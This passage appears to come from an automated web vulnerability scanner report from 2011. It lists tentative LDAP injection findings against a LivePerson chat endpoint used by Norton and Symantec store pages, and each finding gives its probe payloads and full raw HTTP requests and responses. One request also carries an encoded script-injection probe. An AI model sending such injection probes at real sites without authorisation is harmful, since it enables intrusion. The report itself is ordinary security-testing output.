Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 93a3bb2cb00a26ff)(sn=* and 93a3bb2cb00a26ff)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:31 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:33:31 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)!(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:32 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The HumanClickACTIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickACTIVE cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)(sn=*

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:47 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:34:47 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)!(sn=*

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:49 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The HumanClickSiteContainerID_71097838 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickSiteContainerID_71097838 cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:33:40 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:40 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)!(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:41 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 92b3a3f88ff05d96)(sn=* and 92b3a3f88ff05d96)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604062:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:34:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)!(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The protV parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the protV parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604120:-1:1315604070:-1:-1; expires=Sat, 08-Sep-2012 21:35:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)!(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The t parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:36:35 GMT
